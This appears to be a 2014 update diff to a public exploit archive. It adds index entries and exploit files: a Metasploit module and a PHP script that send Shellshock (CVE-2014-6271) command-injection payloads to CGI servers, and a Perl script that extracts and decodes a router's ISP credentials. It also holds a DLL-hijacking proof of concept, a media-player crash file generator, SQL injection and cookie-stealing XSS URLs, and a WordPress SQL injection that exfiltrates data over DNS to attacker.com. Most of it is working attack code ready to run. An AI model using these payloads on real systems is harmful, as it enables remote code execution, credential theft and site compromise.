Updated 09_27_2014

files.csv

@@ -31301,3 +31301,16 @@ id,file,description,date,author,platform,type,port
 34764,platforms/php/webapps/34764.txt,"Cart Engine 3.0 - Multiple Vulnerabilities",2014-09-25,"Quantum Leap",php,webapps,80
 34765,platforms/linux/remote/34765.txt,"GNU bash Environment Variable Command Injection",2014-09-25,"Stephane Chazelas",linux,remote,0
 34766,platforms/linux/remote/34766.php,"Bash Environment Variables Code Injection Exploit",2014-09-25,"Prakhar Prasad & Subho Halder",linux,remote,80
+34767,platforms/windows/dos/34767.py,"BS.Player 2.56 '.m3u' and '.pls' File Processing Multiple Remote Denial of Service Vulnerabilities",2010-09-26,modpr0be,windows,dos,0
+34768,platforms/windows/remote/34768.c,"VirIT eXplorer 6.7.43 'tg-scan.dll' DLL Loading Arbitrary Code Execution Vulnerability",2010-09-27,anT!-Tr0J4n,windows,remote,0
+34769,platforms/php/webapps/34769.txt,"MySITE SQL Injection and Cross Site Scripting Vulnerabilities",2010-09-27,MustLive,php,webapps,0
+34770,platforms/php/webapps/34770.txt,"PHP Scripts Now Hangman index.php n Parameter SQL Injection",2009-07-21,Moudi,php,webapps,0
+34771,platforms/php/webapps/34771.txt,"PHP Scripts Now Hangman index.php letters Parameter XSS",2009-07-21,Moudi,php,webapps,0
+34772,platforms/php/webapps/34772.txt,"Honest Traffic 'msg' Parameter Cross Site Scripting Vulnerability",2009-07-17,Moudi,php,webapps,0
+34773,platforms/php/webapps/34773.txt,"Horde IMP Webmail <= 4.3.7 'fetchmailprefs.php' HTML Injection Vulnerability",2010-09-27,"Moritz Naumann",php,webapps,0
+34774,platforms/php/webapps/34774.txt,"Hotscripts Type PHP Clone Script feedback.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0
+34775,platforms/php/webapps/34775.txt,"Hotscripts Type PHP Clone Script index.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0
+34776,platforms/php/webapps/34776.txt,"Hotscripts Type PHP Clone Script lostpassword.php msg Parameter XSS",2009-08-21,Moudi,php,webapps,0
+34777,platforms/cgi/remote/34777.rb,"GNU bash Environment Variable Command Injection (MSF)",2014-09-25,"Shaun Colley",cgi,remote,0
+34779,platforms/hardware/webapps/34779.pl,"Nucom ADSL ADSLR5000UN ISP Credentials Disclosure",2014-09-25,"Sebastián Magof",hardware,webapps,80
+34781,platforms/php/webapps/34781.txt,"Wordpress All In One WP Security Plugin 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",php,webapps,80

platforms/cgi/remote/34777.rb

@@ -0,0 +1,54 @@
+    require 'msf/core'
+
+    class Metasploit3 < Msf::Auxiliary
+
+        include Msf::Exploit::Remote::HttpClient
+    
+
+        def initialize(info = {})
+            super(update_info(info,
+                'Name'           => 'bashedCgi',
+                'Description'    => %q{
+                   Quick & dirty module to send the BASH exploit payload (CVE-2014-6271) to CGI scripts that are BASH-based or invoke BASH, to execute an arbitrary shell command. 
+                },
+                'Author'         => 
+                  [ 
+                    'Stephane Chazelas',                      # vuln discovery 
+                    'Shaun Colley <scolley at ioactive.com>'  # metasploit module
+                  ],
+                'License'        => MSF_LICENSE,
+                'References'     => [ 'CVE', '2014-6271' ],
+                'Targets'        => 
+                    [
+                        [ 'cgi', {} ]
+                    ],
+                'DefaultTarget'  => 0,
+                'Payload'        =>
+                    {
+                    'Space'      => 1024,
+                    'DisableNops' => true
+                    },
+                'DefaultOptions' => { 'PAYLOAD' => 0 } 
+            ))
+
+                register_options(
+                    [
+                        OptString.new('TARGETURI', [true, 'Absolute path of BASH-based CGI', '/']),
+                        OptString.new('CMD', [true, 'Command to execute', '/usr/bin/touch /tmp/metasploit'])
+                    ], self.class)
+        end
+
+        def run 
+            res = send_request_cgi({
+                'method'   => 'GET',
+                'uri'      => datastore['TARGETURI'],
+                'agent'    => "() { :;}; " + datastore['CMD']
+            })
+
+            if res && res.code == 200
+                print_good("Command sent - 200 received")
+            else
+                print_error("Command sent - non-200 reponse")
+            end
+        end
+    end

platforms/hardware/webapps/34779.pl

@@ -0,0 +1,52 @@
+#!/usr/bin/perl 
+# Exploit Author: Sebastián Magof 
+# Hardware: Modem Nucom ADSL R5000UNv2  
+# Software Version:	R5TC008
+# Vulnerable file: guidewan.html
+# location: http://gateway/telecom_GUI/guidewan.html                  
+# Bug: ISP usr+pwd disclosure 
+# Type: Local 
+# Date: 24/09/2014
+# Vendor Homepage: http://www.nucom.hk/
+# Version: 2.00(R5TC008)
+# Tested on: Linux Fedora 20/Windows 7
+# (\/)
+# (**) Alpha (:
+#(")(")
+#MADE IN ARGENTINA;
+#usage:perl exploit.pl
+use LWP::UserAgent;
+use HTTP::Request;
+use MIME::Base64;
+#begin
+print "\n\n************************************************************\n";
+print "* Modem Nucom ADSL R5000UNv2 ISP credentials disclosure    *\n";#default gateway 192.168.1.1 (Arnet Telecom ISP Argentina) 
+print "************************************************************\n\n";
+ 
+  
+#isp pwd disclosure file
+my $url = "http://192.168.1.1/telecom_GUI/guidewan.html"; 
+   
+  
+#UserAgent
+my $ua = LWP::UserAgent->new();
+$ua->agent("Mozilla/5.0");
+   
+  
+#Request.
+my $req = HTTP::Request->new(GET => $url);
+my $request = $ua->request($req);
+my $content = $request->content(); #content
+my ($pwd) = $content =~ m/pppPassword.value = '(.+)';/;
+my ($usr) = $content =~ m/pppUserName.value = '(.+)';/;
+#decode base64 2 times pwd;
+$encoded = $pwd;
+$decoded = decode_base64($encoded); #decode base64 pwd;
+$decoded2 = decode_base64($decoded); #2nd base64 pwd;
+#ISP usr+pwd Arnet Telecom Argentina;
+print "User: $usr\n";
+print "Password: $decoded2\n\n";
+exit(0);
+  
+  
+__EOF__

platforms/linux/remote/34766.php

@@ -13,9 +13,9 @@ Usage: php bash.php -u http://<hostname>/cgi-bin/<cgi> -c cmd
 Reference: https://www.reddit.com/r/netsec/comments/2hbxtc/cve20146271_remote_code_execution_through_bash/
 
 Test CGI Code : #!/bin/bash
-		echo "Content-type: text/html"
-		echo ""
-		echo "Bash-is-Vulnerable"
+				echo "Content-type: text/html"
+				echo ""
+				echo "Bash-is-Vulnerable"
 
 */
 error_reporting(0);
@@ -23,23 +23,25 @@ if(!defined('STDIN')) die("Please run it through command-line!\n");
 $x  = getopt("u:c:");
 if(!isset($x['u']) || !isset($x['c']))
 {
-die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");
+	die("Usage: ".$_SERVER['PHP_SELF']." -u URL -c cmd\n");
 
 }
 $url = $x['u'];
 $cmd = $x['c'];
 
-	$context = stream_context_create(
-		array(
-			'http' => array(
-				'method'  => 'GET',
-				'header'  => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
-			)
+$context = stream_context_create(
+	array(
+		'http' => array(
+			'method'  => 'GET',
+			'header'  => 'User-Agent: () { :;}; /bin/bash -c "'.$cmd.'"'
 		)
-	);
-	
-	if(!file_get_contents($url, false, $context) && strpos($http_response_header[0],"500") > 0)
+	)
+);
+$req = file_get_contents($url, false, $context);
+if(!$req && strpos($http_response_header[0],"500") > 0 )
 	die("Command sent to the server!\n");
-	else
-	die("Connection Error\n");
+else if($req && !strpos($http_response_header[0],"500") > 0)
+	die("Server didn't respond as it should!\n");
+else if(!$req && $http_response_header == NULL)
+	die("A connection error occurred!\n")
 ?>

platforms/php/webapps/34769.txt

@@ -0,0 +1,8 @@
+source: http://www.securityfocus.com/bid/43510/info
+
+MySITE is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 
+
+http://www.example.com/print.php?id=1&pid=-1%20or%201=1 
+http://www.example.com/portal/modules.php?name=Web_Links&l_op=search&query=%3Cscript%20src=http://websecurity.com.ua/webtools/xss.js%20

platforms/php/webapps/34770.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43513/info
+
+TOPHangman is prone to an SQL-injection vulnerability and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks. 
+
+http://www.example.com/hangman/index.php?letters=A&n=1%20and%201=1+AND%20SUBSTRING(@@version,1,1)=5 TRUE
+http://www.example.com/hangman/index.php?letters=A&n=1%20and%201=1+AND%20SUBSTRING(@@version,1,1)=4 FALSE
+http://www.example.com/hangman/index.php?letters=A&n=1%20and%201=1+union+select+1,version()-- 

platforms/php/webapps/34771.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/43513/info
+ 
+TOPHangman is prone to an SQL-injection vulnerability and an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input.
+ 
+An attacker may leverage these issues to compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials, control how the site is viewed, and launch other attacks.
+ 
+http://www.example.com/index.php?letters=1>"><ScRiPt %0A%0D>alert(308637108657)%3B</ScRiPt>&n=601

platforms/php/webapps/34772.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/43514/info
+
+Honest Traffic is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/script/honesttraffic/index.php?msg=1%3Cscript%3Ealert(313706764927)%3C/script%3E

platforms/php/webapps/34773.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43515/info
+
+Horde IMP Webmail is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data before it is used in dynamic content.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.
+
+Horde IMP 4.3.7 is affected; other versions may also be vulnerable.
+
+http://www.example.com/path/fetchmailprefs.php?actionID=fetchmail_prefs_save&fm_driver=imap&fm_id=zzz%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E%3Cx+y%3D%22&fm_protocol=pop3&fm_lmailbox=INBOX&save=Create

platforms/php/webapps/34774.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/43519/info
+
+Hotscripts Type PHP Clone Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. 
+
+http://www.example.com/hotscriptsclonetypephpscript/feedback.php?msg="><script>alert(document.cookie);</script>

platforms/php/webapps/34775.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/43519/info
+ 
+Hotscripts Type PHP Clone Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+http://www.example.com/hotscriptsclonetypephpscript/index.php?id=1&msg="><script>alert(document.cookie);</script>

platforms/php/webapps/34776.txt

@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/43519/info
+  
+Hotscripts Type PHP Clone Script is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  
+http://www.example.com/hotscriptsclonetypephpscript/lostpassword.php?msg="><script>alert(document.cookie);</script>

platforms/php/webapps/34781.txt

@@ -0,0 +1,68 @@
+Advisory ID: HTB23231
+Product: All In One WP Security WordPress plugin
+Vendor: Tips and Tricks HQ, Peter, Ruhul, Ivy 
+Vulnerable Version(s): 3.8.2 and probably prior
+Tested Version: 3.8.2
+Advisory Publication:  September 3, 2014  [without technical details]
+Vendor Notification: September 3, 2014 
+Vendor Patch: September 12, 2014 
+Public Disclosure: September 24, 2014 
+Vulnerability Type: SQL Injection [CWE-89]
+CVE Reference: CVE-2014-6242
+Risk Level: Medium 
+CVSSv2 Base Score: 6.5 (AV:N/AC:L/Au:S/C:P/I:P/A:P)
+Solution Status: Fixed by Vendor
+Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) 
+
+-----------------------------------------------------------------------------------------------
+
+Advisory Details:
+
+High-Tech Bridge Security Research Lab discovered two SQL injection vulnerabilities in All In One WP Security WordPress plugin, which can be exploited to perform SQL Injection attacks. Both vulnerabilities require administrative privileges, however can be also exploited by non-authenticated attacker via CSRF vector. 
+
+
+1) SQL Injection in All In One WP Security WordPress plugin: CVE-2014-6242
+
+1.1 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "orderby" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
+
+The PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "orderby" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):
+
+http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29
+
+This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with an CSRF exploit, e.g.:
+
+http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&order=,%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29
+
+
+1.2 The vulnerability exists due to insufficient sanitization of user-supplied input passed via the "order" HTTP GET parameters to "/wp-admin/admin.php" script. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code.
+
+The PoC code below is based on DNS Exfiltration technique and may be used to demonstrate vulnerability in the "order" parameter if the database of the vulnerable application is hosted on a Windows system. The PoC will send a DNS request demanding IP addess for `version()` (or any other sensetive output from the database) sub-domain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker):
+
+http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29
+
+This vulnerability could also be exploited by a remote non-authenticated attacker via CSRF vector, since the application is prone to Cross-Site Request Forgery (CSRF) attacks. In order to do so an attacker should trick a logged-in administrator to visit a web page with CSRF exploit, e.g.:
+
+<img src="http://[host]/wp-admin/admin.php?page=aiowpsec&tab=tab1&orderby=%28select%20load_file%28CONCAT%28CHAR%2892%29,CHAR%2892%29,%28select%20version%28%29%29,CHAR%2846%29,CHAR%2897%29,CHAR%28116%29,CHAR%28116%29,CHAR%2897%29,CHAR%2899%29,CHAR%28107%29,CHAR%28101%29,CHAR%28114%29,CHAR%2846%29,CHAR%2899%29,CHAR%28111%29,CHAR%28109%29,CHAR%2892%29,CHAR%28102%29,CHAR%28111%29,CHAR%28111%29,CHAR%2898%29,CHAR%2897%29,CHAR%28114%29%29%29%29">
+
+-----------------------------------------------------------------------------------------------
+
+Solution:
+
+Update to All In One WP Security 3.8.3
+
+More Information:
+https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/changelog/
+
+-----------------------------------------------------------------------------------------------
+
+References:
+
+[1] High-Tech Bridge Advisory HTB23231 - https://www.htbridge.com/advisory/HTB23231 - Two SQL Injections in All In One WP Security WordPress plugin.
+[2] All In One WP Security WordPress plugin - http://www.tipsandtricks-hq.com/wordpress-security-and-firewall-plugin - All round best WordPress security plugin.
+[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
+[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
+[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.
+
+-----------------------------------------------------------------------------------------------
+
+Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

platforms/windows/dos/34767.py

@@ -0,0 +1,36 @@
+source:  http://www.securityfocus.com/bid/43502/info
+
+BS.Player is prone to multiple remote denial-of-service vulnerabilities.
+
+An attacker can exploit these issues to cause an affected application to crash, denying service to legitimate users.
+
+BS.Player 2.56 is vulnerable; other versions may also be affected.
+
+#!/usr/bin/python
+#
+# Exploit Title: BS.Player 2.56 (Build 1043) .m3u and .pls Denial of Service
+# Date: September 27, 2010
+# Author: modpr0be
+# Software Link: http://www.bsplayer.com/bsplayer-setup.exe
+# Version: 2.0.0
+# Tested on: Windows XP SP3/2003
+# CVE : -
+ 
+# How it works?
+# Open BS.Player --> Open the Playlist Window --> Load m3u/pls file --> boom!
+#
+# SEHandler
+# bsplayer.00410041
+#
+# 0012F74C   00410041  A.A.  Pointer to next SEH record
+# 0012F750   00410041  A.A.  SE handler
+#
+# I think this is a kind of unicode exploit. I'm learning this, hope it will run calc, soon.
+# btw...thx corelanc0d3r (PVE) for his great exploit writing tutorial ;)
+#
+ 
+junk = "\x41" * 25000
+ 
+file = open('blah.m3u','w')  # change it if you want to try the .pls
+file.write(junk)
+file.close()

platforms/windows/remote/34768.c

@@ -0,0 +1,54 @@
+source: http://www.securityfocus.com/bid/43506/info
+
+VirIT eXplorer is prone to a vulnerability that lets attackers execute arbitrary code.
+
+An attacker can exploit this issue by enticing a legitimate user to use the vulnerable application to scan a file from a network share location that contains a specially crafted Dynamic Link Library (DLL) file. 
+
+/*
+#VirIT eXplorer Lite DLL Hijacking Exploit (tg-scan.dll)
+
+#Author : anT!-Tr0J4n
+
+#Greetz : Dev-PoinT.com ~ inj3ct0r.com  ~ All Dev-poinT members and my friends
+
+#Email  : D3v-PoinT[at]hotmail[d0t]com & C1EH[at]Hotmail[d0t]com
+
+#Software Link:http://www.tgsoft.it/tgsoft_home.asp
+
+#Tested on: Windows XP sp3
+
+#Description:Vir.IT 6.7.41 AntiVirus + AntiSpyware + Personal Firewall for your computer
+Scan & Clean virus, spyware, trojan, backdoor, bho, dialer, adware,hijacker, keylogger, worm, rootkit, fraudtool & malware
+
+
+#####################
+How  TO use : Compile and rename to tg-scan.dll , create a file in the same dir with one of the following extensions.
+            check the result > Hack3d             
+#####################
+
+#tg-scan.dll (code)
+*/
+ 
+#include "stdafx.h"
+ 
+void init() {
+MessageBox(NULL,"anT!-Tr0J4n", "Hack3d",0x00000003);
+}
+ 
+ 
+BOOL APIENTRY DllMain( HANDLE hModule,
+                       DWORD  ul_reason_for_call,
+                       LPVOID lpReserved
+ )
+{
+    switch (ul_reason_for_call)
+{
+case DLL_PROCESS_ATTACH:
+ init();break;
+case DLL_THREAD_ATTACH:
+case DLL_THREAD_DETACH:
+ case DLL_PROCESS_DETACH:
+break;
+    }
+    return TRUE;
+}